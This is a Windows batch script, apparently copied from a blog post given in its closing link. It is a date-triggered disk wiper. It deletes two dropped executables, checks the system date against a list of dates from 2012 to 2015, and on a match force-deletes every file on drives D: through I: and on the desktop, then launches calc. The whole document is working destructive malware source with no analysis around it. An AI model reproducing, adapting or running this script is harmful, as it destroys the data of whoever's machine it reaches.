@echo off & setlocal sleep for 2 del "%systemroot%\system32\juboot.exe" /q /s /f del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f if "%date%"=="Mon 12/10/2012" goto yes if "%date%"=="Tue 12/11/2012" goto yes if "%date%"=="Wed 12/12/2012" goto yes if "%date%"=="Mon 01/21/2013" goto yes if "%date%"=="Tue 01/22/2013" goto yes if "%date%"=="Wed 01/23/2013" goto yes if "%date%"=="Mon 05/06/2013" goto yes if "%date%"=="Tue 05/07/2013" goto yes if "%date%"=="Wed 05/08/2013" goto yes if "%date%"=="Mon 07/22/2013" goto yes if "%date%"=="Tue 07/23/2013" goto yes if "%date%"=="Wed 07/24/2013" goto yes if "%date%"=="Mon 11/11/2013" goto yes if "%date%"=="Tue 11/12/2013" goto yes if "%date%"=="Wed 11/13/2013" goto yes if "%date%"=="Mon 02/03/2014" goto yes if "%date%"=="Tue 02/04/2014" goto yes if "%date%"=="Wed 02/05/2014" goto yes if "%date%"=="Mon 05/05/2014" goto yes if "%date%"=="Tue 05/06/2014" goto yes if "%date%"=="Wed 05/07/2014" goto yes if "%date%"=="Mon 08/11/2014" goto yes if "%date%"=="Tue 08/12/2014" goto yes if "%date%"=="Wed 08/13/2014" goto yes if "%date%"=="Mon 02/02/2015" goto yes if "%date%"=="Tue 02/03/2015" goto yes if "%date%"=="Wed 02/04/2015" goto yes goto no :yes sleep for 3000 IF EXIST d:\ del "d:\*.*" /q /s /f IF EXIST d:\ Chkdsk d: IF EXIST e:\ del "e:\*.*" /q /s /f IF EXIST e:\ Chkdsk e: IF EXIST f:\ del "f:\*.*" /q /s /f IF EXIST f:\ Chkdsk f: IF EXIST g:\ del "g:\*.*" /q /s /f IF EXIST g:\ Chkdsk g: IF EXIST h:\ del "h:\*.*" /q /s /f IF EXIST h:\ Chkdsk h: IF EXIST i:\ del "i:\*.*" /q /s /f IF EXIST i:\ Chkdsk i: del "%userprofile%\Desktop\*.*" /q /s /f \\start calc :no ----------------------------------------------------------------------------------- Check out Code Between the lines http://www.codebetweenthelines.com